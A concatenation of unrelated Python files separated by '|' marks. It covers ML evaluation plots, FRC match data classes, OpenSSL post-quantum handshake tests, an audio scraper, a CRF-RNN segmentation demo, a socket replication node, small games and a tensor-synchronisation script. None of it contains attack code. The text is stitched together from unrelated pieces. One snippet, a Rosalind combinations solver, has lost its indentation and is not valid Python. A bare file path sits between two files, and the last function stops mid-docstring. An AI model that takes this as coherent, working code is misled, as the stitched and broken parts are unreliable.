    lr = lr.fit(X_train, y_train)
    # Identify and save the best lambda
    lamb = lr.lambda_max_
    # Generate scores for training and test sets
    y_train_scores = lr.predict_proba(X_train, lamb=lamb)[:, 1]
    y_test_scores = lr.predict_proba(X_test, lamb=lamb)[:, 1]
    # Save AUCs
    all_y_train_scores.append(y_train_scores)
    all_y_test_scores.append(y_test_scores)
# Generate scores for training and test sets
all_y_train_scores = np.array(all_y_train_scores)
y_train_scores_mean = np.mean(all_y_train_scores, axis=0)
all_y_test_scores = np.array(all_y_test_scores)
y_test_scores_mean = np.mean(all_y_test_scores, axis=0)
# Compute ROC curve and ROC area for each class
# NOTE(review): both loop iterations call roc_curve with identical arguments,
# so fpr[0]/tpr[0] duplicate fpr[1]/tpr[1]; only index 1 is plotted.
n_classes = 2
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
    fpr[i], tpr[i], _ = metrics.roc_curve(y_train, y_train_scores_mean)
    roc_auc[i] = metrics.auc(fpr[i], tpr[i])
# Compute train ROC curve
plt.figure()
plt.plot(fpr[1], tpr[1], color='black',
         lw=2, label='AUC = %.3f' % roc_auc[1])
plt.plot([0, 1], [0, 1], color='black', lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.title('ROC Curve (Training Set)')
plt.legend(loc="lower right")
if SHOW:
    plt.show()
if SAVE:
    plt.savefig('./train_roc_curve.png')
# Compute ROC curve and ROC area for each class
# Same redundancy as above: both iterations compute the identical test curve.
n_classes = 2
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
    fpr[i], tpr[i], _ = metrics.roc_curve(y_test, y_test_scores_mean)
    roc_auc[i] = metrics.auc(fpr[i], tpr[i])
# Compute test ROC curve
plt.figure()
plt.plot(fpr[1], tpr[1], color='black',
         lw=2, label='AUC = %.3f' % roc_auc[1])
plt.plot([0, 1], [0, 1], color='black', lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.title('ROC Curve (Test Set)')
plt.legend(loc="lower right")
if SHOW:
    plt.show()
if SAVE:
    plt.savefig('./test_roc_curve.png')
##############################################################################
# Replicating figure 4 - Done!
##############################################################################
# AUC distribution over N_DIVISIONS random train/test splits, each averaged
# over N_ITERATIONS cross-validated fits. O(N_DIVISIONS * N_ITERATIONS) fits —
# this section dominates the script's runtime.
# Create temporary containers
all_train_aucs = []
all_test_aucs = []
# Loop over number of divisions
for i in tqdm(range(N_DIVISIONS)):
    # Split data
    mask = sample_equal_proportion(y, proportion=TRAIN_SIZE, random_state=i)
    y_train = y[mask]
    y_test = y[np.logical_not(mask)]
    X_train = X[mask, :]
    X_test = X[np.logical_not(mask), :]
    # Create temporary containers
    train_aucs = []
    test_aucs = []
    # Loop over number of iterations
    for j in range(N_ITERATIONS):
        # Fit LogisticNet with the training set
        lr = LogitNet(alpha=ALPHA, n_lambda=N_LAMBDA, standardize=False, n_folds=N_FOLDS, max_iter=MAX_ITER, random_state=j)
        lr = lr.fit(X_train, y_train)
        # Identify and save the best lambda
        lamb = lr.lambda_max_
        # Generate scores for training and test sets
        y_train_scores = lr.predict_proba(X_train, lamb=lamb)[:, 1]
        y_test_scores = lr.predict_proba(X_test, lamb=lamb)[:, 1]
        # Calculate AUC on training and test sets
        train_auc = metrics.roc_auc_score(y_train, y_train_scores)
        test_auc = metrics.roc_auc_score(y_test, y_test_scores)
        # Save AUCs
        train_aucs.append(train_auc)
        test_aucs.append(test_auc)
    # Process loop and save in temporary containers
    all_train_aucs.append(np.mean(train_aucs))
    all_test_aucs.append(np.mean(test_aucs))
all_train_aucs = np.array(all_train_aucs)
all_train_auc_mean = np.mean(all_train_aucs)
all_test_aucs = np.array(all_test_aucs)
all_test_auc_mean = np.mean(all_test_aucs)
# Histogram the per-division mean AUCs for train and test.
bins = np.arange(0, 1, 0.02)
plt.figure()
plt.hist(all_train_aucs, bins=bins, color='white', edgecolor='black')
plt.axvline(x=all_train_auc_mean, color='black', linestyle='--')
plt.annotate('Mean AUC = %.3f' % all_train_auc_mean, xy=(150, 200), xycoords='figure pixels', size=28)
plt.xlim([0.0, 1.0])
plt.xlabel('AUC')
plt.ylabel('Frequency')
plt.title('Distribution of AUCs (Training Set)')
if SHOW:
    plt.show()
if SAVE:
    plt.savefig('./train_auc_distribution.png')
plt.figure()
plt.hist(all_test_aucs, bins=bins, color='white', edgecolor='black')
plt.axvline(x=all_test_auc_mean, color='black', linestyle='--')
plt.annotate('Mean AUC = %.3f' % all_test_auc_mean, xy=(150, 200), xycoords='figure pixels', size=28)
plt.xlim([0.0, 1.0])
plt.xlabel('AUC')
plt.ylabel('Frequency')
plt.title('Distribution of AUCs (Test Set)')
if SHOW:
    plt.show()
if SAVE:
    plt.savefig('./test_auc_distribution.png')
|
import sys
from math import factorial
if __name__ == "__main__":
'''
Given: Positive integers n and m with 0≤m≤n≤2000.
Return: The sum of combinations C(n,k) for all k satisfying m≤k≤n, modulo 1,000,000. In shorthand, ∑nk=m(nk).
'''
n, m = map(int, sys.stdin.read().splitlines()[0].split())
total = 0
for i in range(m, n + 1):
total += factorial(n) // (factorial(i) * factorial(n - i))
print(total % int(1e6)) |
from . import question_logit
from . import symbol_cost
from . import symbol_features
|
class Alliance(object):
    """A match alliance: the list of member teams plus its final score."""

    def __init__(self, score=None, teams=None):
        # Fresh list per instance: the original `teams=[]` default was one
        # shared list silently mutated by every Alliance built without teams.
        self.teams = [] if teams is None else teams
        self.score = score
class Alliance2017(Alliance):
    """2017 (Steamworks) alliance: fuel, rotor and touchpad details."""

    def __init__(
            self,
            score=None,
            teams=None,
            fuel_score=None,
            fuel_count=None,
            rotor_count=None,
            touchpad_count=None):
        # Normalize the mutable default here (not just in the base class) so
        # no list is ever shared between instances.
        super(Alliance2017, self).__init__(
            score=score, teams=[] if teams is None else teams)
        self.fuel_score = fuel_score
        self.fuel_count = fuel_count
        self.rotor_count = rotor_count
        self.touchpad_count = touchpad_count

    def getString(self, prefix):
        """Return a newline-terminated, `prefix`-tagged dump of all fields."""
        return (
            '{} score: {}\n'.format(prefix, self.score) +
            '{} fuel_score: {}\n'.format(prefix, self.fuel_score) +
            '{} fuel_count: {}\n'.format(prefix, self.fuel_count) +
            '{} rotor_count: {}\n'.format(prefix, self.rotor_count) +
            '{} touchpad_count: {}\n'.format(prefix, self.touchpad_count)
        )
class Alliance2018(Alliance):
    """2018 (Power Up) alliance: powerup counts, plate ownership, endgame."""

    def __init__(
            self,
            score=None,
            teams=None,
            boost_count=None,
            boost_played=None,
            force_count=None,
            force_played=None,
            levitate_count=None,
            levitate_played=None,
            switch_owned=None,
            scale_owned=None,
            current_powerup=None,
            powerup_time_remaining=None,
            auto_quest=None,
            face_the_boss=None,
    ):
        # Normalize the mutable default here (not just in the base class) so
        # no list is ever shared between instances.
        super(Alliance2018, self).__init__(
            score=score, teams=[] if teams is None else teams)
        self.boost_count = boost_count
        self.boost_played = boost_played
        self.force_count = force_count
        self.force_played = force_played
        self.levitate_count = levitate_count
        self.levitate_played = levitate_played
        self.switch_owned = switch_owned
        self.scale_owned = scale_owned
        self.current_powerup = current_powerup
        self.powerup_time_remaining = powerup_time_remaining
        self.auto_quest = auto_quest
        self.face_the_boss = face_the_boss

    def getString(self, prefix):
        """Return a newline-terminated, `prefix`-tagged dump of all fields."""
        return (
            '{} score: {}\n'.format(prefix, self.score) +
            '{} force_count: {}\n'.format(prefix, self.force_count) +
            '{} force_played: {}\n'.format(prefix, self.force_played) +
            '{} levitate_count: {}\n'.format(prefix, self.levitate_count) +
            '{} levitate_played: {}\n'.format(prefix, self.levitate_played) +
            '{} boost_count: {}\n'.format(prefix, self.boost_count) +
            '{} boost_played: {}\n'.format(prefix, self.boost_played) +
            '{} switch_owned: {}\n'.format(prefix, self.switch_owned) +
            '{} scale_owned: {}\n'.format(prefix, self.scale_owned) +
            '{} current_powerup: {}\n'.format(prefix, self.current_powerup) +
            '{} powerup_time_remaining: {}\n'.format(prefix, self.powerup_time_remaining) +
            '{} auto_quest: {}\n'.format(prefix, self.auto_quest) +
            '{} face_the_boss: {}\n'.format(prefix, self.face_the_boss)
        )
class Alliance2019(Alliance):
    """2019 alliance: per-robot HAB levels plus hatch/cargo counts.

    Note: getString intentionally mirrors the original output and does not
    include the per-robot fields.
    """

    def __init__(
            self,
            score=None,
            teams=None,
            robot1_starting_level=None,
            robot1_hab_line_cross=None,
            robot1_ending_level=None,
            robot2_starting_level=None,
            robot2_hab_line_cross=None,
            robot2_ending_level=None,
            robot3_starting_level=None,
            robot3_hab_line_cross=None,
            robot3_ending_level=None,
            cargo_ship_hatch_count=None,
            cargo_ship_cargo_count=None,
            rocket1_hatch_count=None,
            rocket1_cargo_count=None,
            rocket2_hatch_count=None,
            rocket2_cargo_count=None,
            rocket_rp=None,
            hab_rp=None,
    ):
        # Normalize teams to avoid the shared mutable-default list.
        super(Alliance2019, self).__init__(
            score=score, teams=[] if teams is None else teams)
        # BUGFIX: robot1_starting_level was assigned twice in the original.
        self.robot1_starting_level = robot1_starting_level
        self.robot1_hab_line_cross = robot1_hab_line_cross
        self.robot1_ending_level = robot1_ending_level
        self.robot2_starting_level = robot2_starting_level
        self.robot2_hab_line_cross = robot2_hab_line_cross
        self.robot2_ending_level = robot2_ending_level
        self.robot3_starting_level = robot3_starting_level
        self.robot3_hab_line_cross = robot3_hab_line_cross
        self.robot3_ending_level = robot3_ending_level
        self.cargo_ship_hatch_count = cargo_ship_hatch_count
        self.cargo_ship_cargo_count = cargo_ship_cargo_count
        self.rocket1_hatch_count = rocket1_hatch_count
        self.rocket1_cargo_count = rocket1_cargo_count
        self.rocket2_hatch_count = rocket2_hatch_count
        self.rocket2_cargo_count = rocket2_cargo_count
        self.rocket_rp = rocket_rp
        self.hab_rp = hab_rp

    def getString(self, prefix):
        """Return a prefix-tagged, newline-terminated summary of scoring fields."""
        return (
            '{} score: {}\n'.format(prefix, self.score) +
            '{} cargo_ship_hatch_count: {}\n'.format(prefix, self.cargo_ship_hatch_count) +
            '{} cargo_ship_cargo_count: {}\n'.format(prefix, self.cargo_ship_cargo_count) +
            '{} rocket1_hatch_count: {}\n'.format(prefix, self.rocket1_hatch_count) +
            '{} rocket1_cargo_count: {}\n'.format(prefix, self.rocket1_cargo_count) +
            '{} rocket2_hatch_count: {}\n'.format(prefix, self.rocket2_hatch_count) +
            '{} rocket2_cargo_count: {}\n'.format(prefix, self.rocket2_cargo_count) +
            '{} rocket_rp: {}\n'.format(prefix, self.rocket_rp) +
            '{} hab_rp: {}\n'.format(prefix, self.hab_rp)
        )
class OngoingMatchDetails(object):
    """Snapshot of a match in progress: identity, phase, clock, alliances."""

    def __init__(self, match_key=None, match_name=None, mode=None, time=None,
                 red=None, blue=None):
        self.match_key = match_key
        self.match_name = match_name
        self.mode = mode  # match phase indicator as provided by the caller
        self.time = time  # time remaining, as provided by the caller
        # Build alliances per-instance: a default of red=Alliance() in the
        # signature is evaluated once at definition time, so every
        # OngoingMatchDetails would have shared the same two Alliance objects.
        self.red = red if red is not None else Alliance()
        self.blue = blue if blue is not None else Alliance()

    def __str__(self):
        return 'Match Key: {}\nMatch Name: {}\nMode: {}\nTime remaining: {}\n{}{}'.format(
            self.match_key, self.match_name, self.mode, self.time,
            self.red.getString('Red'), self.blue.getString('Blue'))
|
import helpers
import os
import sys
import time
# Key-exchange algorithms supported by the OQS OpenSSL 1.1.1 fork
# ('p256-' prefixed entries are hybrid classical + post-quantum groups).
kex_algs_master_111 = ['oqs_kem_default', 'bike1l1', 'bike1l3', 'bike1l5', 'bike2l1', 'bike2l3', 'bike2l5', 'bike3l1', 'bike3l3', 'bike3l5', 'frodo640aes', 'frodo640cshake', 'frodo976aes', 'frodo976cshake', 'newhope512cca', 'newhope1024cca', 'sidh503', 'sidh751', 'sike503', 'sike751', 'p256-oqs_kem_default', 'p256-bike1l1', 'p256-bike2l1', 'p256-bike3l1', 'p256-frodo640aes', 'p256-frodo640cshake', 'p256-newhope512cca', 'p256-sidh503', 'p256-sike503']
# Signature algorithms: classical (rsa/ecdsa), post-quantum, and hybrids.
sig_algs_master_111 = ['rsa', 'ecdsa', 'picnicl1fs', 'qteslaI', 'qteslaIIIsize', 'qteslaIIIspeed', 'rsa3072_picnicl1fs', 'rsa3072_qteslaI', 'p256_picnicl1fs', 'p256_qteslaI', 'p384_qteslaIIIsize', 'p384_qteslaIIIspeed']
# Active selections consumed by the test generators below.
kex_algs = kex_algs_master_111
sig_algs = sig_algs_master_111
def test_gen_keys():
    """Nose test generator: one key-generation case per signature algorithm."""
    global sig_algs
    for alg in sig_algs:
        yield gen_keys, alg
def gen_keys(sig_alg):
    """Generate a CA and a CA-signed server certificate for *sig_alg*.

    Produces <alg>_CA.key/.crt and <alg>_srv.key/.csr/.crt in the parent
    directory, via the fork's apps/openssl binary.  The ecdsa path only
    differs from the post-quantum path in the -newkey argument, so the
    three shared openssl invocations are no longer duplicated.
    """
    if sig_alg == 'ecdsa':
        # ECDSA needs explicit curve parameters generated up front;
        # -newkey then points at the parameter file.
        helpers.run_subprocess(
            [
                'apps/openssl', 'ecparam',
                '-out', 'secp384r1.pem',
                '-name', 'secp384r1'
            ],
            os.path.join('..')
        )
        newkey = 'ec:secp384r1.pem'
    else:
        newkey = sig_alg
    # generate CA key and self-signed cert
    helpers.run_subprocess(
        [
            'apps/openssl', 'req', '-x509', '-new',
            '-newkey', newkey,
            '-keyout', '{}_CA.key'.format(sig_alg),
            '-out', '{}_CA.crt'.format(sig_alg),
            '-nodes',
            '-subj', '/CN=oqstest CA',
            '-days', '365',
            '-config', 'apps/openssl.cnf'
        ],
        os.path.join('..')
    )
    # generate server CSR
    helpers.run_subprocess(
        [
            'apps/openssl', 'req', '-new',
            '-newkey', newkey,
            '-keyout', '{}_srv.key'.format(sig_alg),
            '-out', '{}_srv.csr'.format(sig_alg),
            '-nodes',
            '-subj', '/CN=oqstest server',
            '-config', 'apps/openssl.cnf'
        ],
        os.path.join('..')
    )
    # sign the server CSR with the CA to produce the server cert
    helpers.run_subprocess(
        [
            'apps/openssl', 'x509', '-req',
            '-in', '{}_srv.csr'.format(sig_alg),
            '-out', '{}_srv.crt'.format(sig_alg),
            '-CA', '{}_CA.crt'.format(sig_alg),
            '-CAkey', '{}_CA.key'.format(sig_alg),
            '-CAcreateserial',
            '-days', '365'
        ],
        os.path.join('..')
    )
def test_connection():
    """Nose test generator: one handshake case per (sig, kex) pair.

    Each case gets its own port so parallel/serial runs never collide.
    """
    global sig_algs, kex_algs
    base_port = 23567
    offset = 0
    for sig in sig_algs:
        for kex in kex_algs:
            yield run_connection, sig, kex, base_port + offset
            offset += 1
def run_connection(sig_alg, kex_alg, port):
    """Run one TLS handshake test via the do_openssl-111.sh wrapper.

    The wrapper script reads the algorithms and port from the environment
    variables SIGALG, KEXALG and PORT.
    """
    cmd = os.path.join('oqs_test', 'scripts', 'do_openssl-111.sh')  # stray ';' removed
    helpers.run_subprocess(
        [cmd],
        os.path.join('..'),
        env={'SIGALG': sig_alg, 'KEXALG': kex_alg, 'PORT': str(port)}
    )
if __name__ == '__main__':
    # Prefer nose2; fall back to legacy nose when nose2 is not installed.
    try:
        import nose2
        nose2.main()
    except ImportError:
        import nose
        nose.runmodule()
|
from bs4 import BeautifulSoup
from tqdm import tqdm
from pathlib import Path
import urllib.request
import requests
import math
import os
def main():
    """Scrape 'Audio' links from a saved t2k.html page and download each track.

    Each file streams to '<name>.download' first and is renamed to the
    final name only after the transfer completes, so a leftover .download
    file marks an interrupted run.
    """
    with open("t2k.html") as fp:
        soup = BeautifulSoup(fp, "html.parser")
    # Collect the unique links labelled 'Audio', upgraded to https.
    s2 = soup.select("div.yeeditor a")
    k = []
    for t in s2:
        if t.text == 'Audio':
            link = t.attrs['href']
            if link.startswith("http://"):
                link = "https://" + link[7:]
            if link not in k:
                k.append(link)
    print("Found {0}".format(len(k)))
    downloads = []
    for url in k:
        print("Open {0}".format(url))
        with urllib.request.urlopen(url) as f:
            phtml = BeautifulSoup(f.read(), "html.parser")
            s3 = phtml.select_one("source")
            dl = "http:" + s3.attrs['src']
            if dl in downloads:
                print(dl + " already in download queue.")
            else:
                downloads.append(dl)
                # titleEl = phtml.select_one("#sp-page-builder div > div > div.sppb-col-sm-9 > div > div.full-width.m-bottom-20 > h2")
                titleEl = phtml.select_one("span.text-red")
                titleEl2 = phtml.select("span.light.font-bold")[0]
                filename = "TOP 2000 - " + titleEl2.text + " - " + titleEl.text + " - " + Path(dl).name
                filenameTmp = filename + ".download"
                if os.path.exists(filenameTmp):
                    os.remove(filenameTmp)
                    print("tmp file removed")
                if os.path.exists(filename):
                    print(filename + " already downloaded")
                else:
                    # Streaming, so we can iterate over the response.
                    r = requests.get(dl, stream=True)
                    # Total size in bytes.
                    total_size = int(r.headers.get('content-length', 0))
                    block_size = 1024
                    wrote = 0
                    # 'out' instead of 'f': the original shadowed the urlopen
                    # handle with the output file handle.
                    with open(filenameTmp, 'wb') as out:
                        # BUGFIX: math.ceil(total_size // block_size) floored
                        # before ceiling, so the tqdm chunk total was one short
                        # whenever the size is not a multiple of block_size.
                        for data in tqdm(r.iter_content(block_size), total=math.ceil(total_size / block_size), unit='KB', unit_scale=True, desc=filename):
                            wrote = wrote + len(data)
                            out.write(data)
                    if total_size != 0 and wrote != total_size:
                        print("ERROR, something went wrong")
                    os.rename(filenameTmp, filename)


if __name__ == "__main__":
    main()
|
from django.contrib import admin
from .models import Team, Member, Project
# Expose the roster models in the Django admin interface.
for model in (Team, Member, Project):
    admin.site.register(model)
# -*- coding: utf-8 -*-
"""
This package contains code for the "CRF-RNN" semantic image segmentation method, published in the
ICCV 2015 paper Conditional Random Fields as Recurrent Neural Networks. Our software is built on
top of the Caffe deep learning library.
Contact:
Shuai Zheng (szheng@robots.ox.ac.uk), Sadeep Jayasumana (sadeep@robots.ox.ac.uk), Bernardino Romera-Paredes (bernard@robots.ox.ac.uk)
Supervisor:
Philip Torr (philip.torr@eng.ox.ac.uk)
For more information about CRF-RNN, please visit the project website http://crfasrnn.torr.vision.
"""
# Location of the Caffe checkout; its python/ dir is put on sys.path below.
caffe_root = '../../'
import sys
sys.path.insert(0, caffe_root+'python')
import os, time
import cPickle
import logging
import numpy as np
from PIL import Image as PILImage
import cStringIO as StringIO
import caffe
# Network definition, trained weights, and the image to segment.
MODEL_FILE = 'TVG_CRFRNN_new_deploy.prototxt'
PRETRAINED = 'TVG_CRFRNN_COCO_VOC.caffemodel'
IMAGE_FILE = 'input.jpg'
net = caffe.Net(MODEL_FILE, PRETRAINED, caffe.TEST)
caffe.set_mode_gpu()
caffe.set_device(0)
# caffe.io loads images as floats in [0, 1]; scale back to 0-255.
input_image = 255 * caffe.io.load_image(IMAGE_FILE)
image = PILImage.fromarray(np.uint8(input_image))
image = np.array(image)
# Color palette for the output label image (3 values per class index).
pallete = [0,0,0, 128,0,0, 0,128,0, 128,128,0, 0,0,128, 128,0,128, 0,128,128, 128,128,128, 64,0,0, 192,0,0, 64,128,0, 192,128,0, 64,0,128, 192,0,128, 64,128,128, 192,128,128, 0,64,0, 128,64,0, 0,192,0, 128,192,0, 0,64,128, 128,64,128, 0,192,128, 128,192,128, 64,64,0, 192,64,0, 64,192,0, 192,192,0]
mean_vec = np.array([103.939, 116.779, 123.68], dtype=np.float32)
reshaped_mean_vec = mean_vec.reshape(1, 1, 3) # in BGR order
# Rearrange channels to form BGR
im = image[:,:,::-1]
# Subtract mean
im = im - reshaped_mean_vec
# Pad as necessary: the network expects a 500x500 input, so the image
# is zero-padded at the bottom/right (assumes image is at most 500px).
cur_h, cur_w, cur_c = im.shape
pad_h = 500 - cur_h
pad_w = 500 - cur_w
im = np.pad(im, pad_width=((0, pad_h), (0, pad_w), (0, 0)), mode = 'constant', constant_values = 0)
im = im.transpose((2,0,1))
net.blobs['data'].data[...] = im
# Get predictions (forward pass), timed.
begintime = time.time()
net.forward()
endtime = time.time()
print("prediction time: "+str(endtime-begintime)+" sec")
# Per-pixel argmax over class scores, then crop back to the original size.
out = net.blobs['pred'].data[0].argmax(axis=0).astype(np.uint8)
seg2 = out[0:cur_h,0:cur_w]
output_im = PILImage.fromarray(seg2)
output_im.putpalette(pallete)
output_im.save('output.png')
../../cma_es/cma.py |
#!/usr/bin/env python3
import sys
import threading
import socket
import time
import math
from log import log
class PRM(object):
    """Passive replication manager node.

    On construction it loads three hard-coded logs, opens a listening
    socket plus outgoing connections to itself and two peers, and then
    enters a blocking command loop — so __init__ never returns.
    """

    def __init__(self, nodeId, prmIp, prmIp_2, prmIp_3, prmPort):
        self.nodeId = str(nodeId)
        self.prmIp = str(prmIp)
        self.prmIp_2 = str(prmIp_2)
        self.prmIp_3 = str(prmIp_3)
        self.prmPort = int(prmPort)
        self.pause = False       # True while replication is suspended
        self.logs = []           # log objects; each exposes .dict and .filename
        self.connection = None   # command connection accepted in startListener()
        #hardcode logs for test
        log1 = log()
        log2 = log()
        log3 = log()
        log1.setLogFromFilename2("1reduced")
        log2.setLogFromFilename2("2reduced")
        log3.setLogFromFilename2("3reduced")
        self.logs.append(log1)
        self.logs.append(log2)
        self.logs.append(log3)
        self.outgoingPRM_itself = None
        self.outgoingPRM_2 = None
        self.outgoingPRM_3 = None
        # startListener() blocks in accept(); processCommands() loops forever.
        self.startListener()
        self.startOutgoing()
        self.processCommands()

    def add(self, filename):
        """Load *filename* into a fresh log object and append it to self.logs."""
        print("adding " + str(filename) + " to log")
        mLog = log()
        mLog.setLogFromFilename2(str(filename))
        # BUGFIX: the original appended the undefined name 'mLog1' (NameError).
        self.logs.append(mLog)

    def startOutgoing(self):
        """Connect outgoing sockets to this node's PRM and both peers.

        Each connection is retried every 2 seconds until it succeeds.
        """
        connected = False
        while connected != True:
            try:
                self.outgoingPRM_itself = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                self.outgoingPRM_itself.connect( (self.prmIp, self.prmPort) )
                print("Node " + str(self.nodeId) + ": Outgoing socket for its own PRM (" + str(self.prmIp) + "," + str(self.prmPort) + ") ready\n")
                connected = True
            except socket.error:
                print("Can't connect")
                time.sleep(2)
        connected = False
        while connected != True:
            try:
                self.outgoingPRM_2 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                self.outgoingPRM_2.connect( (self.prmIp_2, self.prmPort) )
                print("Node " + str(self.nodeId) + ": Outgoing socket for its 2nd PRM (" + str(self.prmIp_2) + "," + str(self.prmPort) + ") ready\n")
                connected = True
            except socket.error:
                print("Node " + str(self.nodeId) + " can't connect to ip: " + str(self.prmIp_2))
                time.sleep(2)
        connected = False
        while connected != True:
            try:
                self.outgoingPRM_3 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                self.outgoingPRM_3.connect( (self.prmIp_3, self.prmPort) )
                print("Node " + str(self.nodeId) + ": Outgoing socket for its 3rd PRM (" + str(self.prmIp_3) + "," + str(self.prmPort) + ") ready\n")
                connected = True
            except socket.error:
                print("Node " + str(self.nodeId) + " can't connect to ip: " + str(self.prmIp_3))
                time.sleep(2)
        print("All PRM outgoing sockets connected")

    def startListener(self):
        """Bind the listening socket and block until one client connects."""
        self.listeningSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listeningSocket.bind( (self.prmIp, self.prmPort) )
        self.listeningSocket.setblocking(1)
        self.listeningSocket.listen(5)
        self.connection,addr = self.listeningSocket.accept()
        print("Node " + str(self.nodeId) + " PRM: Listening socket (" + str(self.prmIp) + "," + str(self.prmPort) + ") ready\n")

    def cli_total(self):
        """Print the sum of every value across all log dicts."""
        total = 0
        for log in self.logs:
            for key,value in log.dict.items():
                total = total + int(value)
        print(str(total))
        print("\n")

    def cli_print(self):
        """Print the filename of each loaded log."""
        for log in self.logs:
            print(str(log.filename))
        print("\n")

    def cli_merge(self, pos1, pos2):
        """Print the merged (key, summed-value) pairs of two logs.

        Positions are 1-based indexes into self.logs.
        """
        #beginning at 1 ...
        final_list = {}
        for key,value in self.logs[int(pos1) - 1].dict.items():
            final_list[key] = int(value)
        for key,value in self.logs[int(pos2) - 1].dict.items():
            if key not in final_list:
                final_list[key] = int(value)
            else:
                final_list[key] = final_list[key] + int(value)
        for key, value in final_list.items():
            print("(" + str(key) + "," + str(value) + ")")
        print("\n")

    def processCommands(self):
        """Blocking command loop over the accepted connection."""
        while True:
            try:
                data = self.connection.recv(1024)
                print(str(data.decode()))
                command = str(data.decode())
            except socket.timeout:
                break
            except socket.error:
                print("Error occurred when check for command")
                break
            else:
                command = str(data.decode())
                print(str(command))
                if command != '':
                    if(command.split()[0] == "replicate"):
                        if(self.pause == False):
                            #replicate freely
                            print("\nPRM replicate not yet finished\n")
                        elif(self.pause == True):
                            print("\nSorry, PRM is paused.\n")
                    elif(command.split()[0] == "add"):
                        # BUGFIX: 'filename' was printed before it was
                        # assigned, raising UnboundLocalError on first use
                        # (or reusing a stale value from an earlier command).
                        filename = str(command.split()[1])
                        print(str(filename) + " added to log")
                        self.add(filename)
                        print(str(filename) + " added to log1")
                    elif(command.split()[0] == "stop"):
                        self.pause = True
                        print("\nPRM paused!\n")
                    elif(command.split()[0] == "resume"):
                        self.pause = False
                        print("\nPRM resumed!\n")
                    elif(command.split()[0] == "total"):
                        self.cli_total()
                    elif(command.split()[0] == "print"):
                        self.cli_print()
                    elif(command.split()[0] == "merge"):
                        if len(command.split()) == 3:
                            self.cli_merge(command.split()[1], command.split()[2])
                        else:
                            print("\nIncorrect number of arguments for merge command\n")
                    else:
                        print("\nSorry, invalid command. ")
|
import random
# noWin == 0 requests that a fresh secret number be drawn by start();
# guessCounter counts the tries in the current round.
noWin = 1
guessCounter = 0
# Secret number in [0, 100).
number = random.randrange(0,100,1)
def start():
    """Prompt for a guess and dispatch to win()/lower()/higher()."""
    global number
    if (noWin == 0):
        # A new round was requested: draw a fresh secret number.
        number = random.randrange(0,100,1)
    guess = input("Guess the integer I'm thinking of between 0 and 100. ")
    # BUGFIX: the original tested '> 100 and < 0', which no number can
    # satisfy, so the out-of-range warning never printed.
    if int(guess) > 100 or int(guess) < 0:
        print("That number's not in our range! Try again.")
    if int(guess) == number:
        win()
    elif int(guess) > number:
        lower()
    elif int(guess) < number:
        higher()
def win():
    """Report the correct guess, then offer a rematch."""
    global noWin
    global guessCounter
    guessCounter += 1
    print("Congratulations! You guessed the number I was thinking of.")
    print("It took you " + str(guessCounter) + " tries.")
    guessCounter = 0
    playAgain = input("Would you like to play again? Type Y or N. ")
    if playAgain == "N":
        pass
    elif playAgain == "Y":
        # Request a fresh secret number and restart.
        noWin = 0
        start()
    else:
        print("I couldn't understand you because you didn't say Y or N, so I'm going to take that as a no.")
def lower():
    """Tell the player their guess was too high, then loop back."""
    global noWin, guessCounter
    print("The number is lower than what you guessed. Guess again!")
    guessCounter += 1
    noWin = 1  # keep the same secret number for the next attempt
    start()
def higher():
    """Tell the player their guess was too low, then loop back."""
    global noWin, guessCounter
    print("The number is higher than what you guessed. Guess again!")
    guessCounter += 1
    noWin = 1  # keep the same secret number for the next attempt
    start()
start() |
import sys


def classify_number(number):
    """Classify a candidate telephone number string.

    Returns the verdict message: valid 10-digit number, digits-only but
    wrong length, or contains non-digit characters.
    """
    if number.isdigit() and len(number) == 10:
        return 'This telephone number is legit!'
    if number.isdigit():
        return 'This telephone number contains more or less than 10 digits'
    return 'This telephone number contains letter, please repeat('


if __name__ == '__main__':
    # Robustness: the original indexed sys.argv[1] unconditionally and
    # crashed with IndexError when no argument was supplied.
    if len(sys.argv) < 2:
        print('Usage: give the telephone number as the first argument')
    else:
        print(classify_number(sys.argv[1]))
import syntensor
import numpy as np
import json
import os
import sys
# Print arrays in full (no wrapping / truncation) for easier inspection.
np.set_printoptions(linewidth = np.nan)
np.set_printoptions(threshold=np.inf)
image_nums = 156
current_path = 'temp'
'''
fname = 'new_data_10.json'
sys.stdin = open(fname,'r')
data = input()
data = json.loads(data)
Plist = np.array(data['P'],np.ndarray)
mlist = np.array(data['mlist'])
#print(mlist)
#print(Plist[1][0])
'''
# Pairwise matrix table P[q][t], accumulated from five JSON shards.
Plist = np.zeros([156,156],np.ndarray)
mlist = None
for i in range(1,6):
    print(i)
    f = open(os.path.join(current_path,"%d.json"%i) ,'r')
    j = json.load(f)
    loaded = 0
    if mlist is None:
        mlist = np.array(j['mlist'])
    else :
        # Remember how many entries were already loaded, then extend mlist.
        loaded = len(mlist)
        mlist = np.hstack([mlist,np.array( j['mlist'] )] )
    l = np.size(mlist)
    # Fill only the rows/columns introduced by this shard (both triangles).
    for q in range(loaded,l):
        for t in range(loaded,156):
            # Diagnostic: an int entry flags missing matrix data in the shard.
            if type(j['P'][q][t]) == int:
                print(i,q,t)
            Plist[q][t] = j['P'][q][t]
            Plist[t][q] = j['P'][t][q]
n = len(mlist)
# Transpose the block table: PPP[i][j] receives a copy of Plist[j][i].
PPP = np.zeros([n,n],np.ndarray)
for i in range(n):
    for j in range(n):
        PPP[i][j] = Plist[j][i].copy()
Plist = PPP
# Build the synchronization tensor, solve, and save/visualize the result.
tensor = syntensor.SynTensor(n,mlist,Plist)
print('object building finished')
Q = tensor.solution()
np.save(os.path.join(current_path,'156.npy'),Q,)
k = tensor.rounded_solution(0.5,2,1,Q )
print(np.shape(k))
print(k)
tensor.visualize(image_nums ,os.path.join( current_path,'image_list.npy' ), os.path.join(current_path,'tmp_%d'%image_nums) )
#f = open('D:\\paper\\tensor syn\\res.txt','w')
#sys.stdout = f
#print(np.float32(sol))
#print(np.float32(k))
#import sys
#input = sys.stdin.readline
def main():
    """Read N numeric strings and print them in sorted order.

